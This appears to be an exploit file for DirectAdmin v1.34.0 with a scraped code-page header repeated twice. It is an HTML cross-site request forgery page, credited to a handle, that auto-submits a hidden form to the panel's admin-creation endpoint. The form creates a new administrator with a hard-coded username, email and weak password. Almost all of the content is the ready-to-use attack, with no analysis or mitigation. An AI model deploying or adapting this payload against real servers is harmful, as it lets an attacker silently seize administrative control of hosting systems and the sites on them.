16 lines
No EOL
666 B
Text
16 lines
No EOL
666 B
Text
# Vendor: [http://www.directadmin.com/]
|
|
# Code : [Create Administrator] :
|
|
|
|
|
|
<html>
|
|
<title>DirectAdmin v1.34.0 XSRF Create Administrator Vulnerability</title>
|
|
<!--!Set You'r victim By SarBoT511 !-->
|
|
<form name="reseller" action="http://site.com:2222/CMD_ACCOUNT_ADMIN" method="post">
|
|
<input type="hidden" name=action value=create>
|
|
<input type="hidden" name="username" value="sec-r1z"></br>
|
|
<input type="hidden" name="email" value="r1z@sec-r1z.com"></br>
|
|
<input type="hidden" name="passwd" value="123456789"></br>
|
|
<input type="hidden" name="passwd2" value="123456789"></br>
|
|
<input type="hidden" value="Submit">
|
|
<body onload="document.forms.reseller.submit();">
|
|
</html> |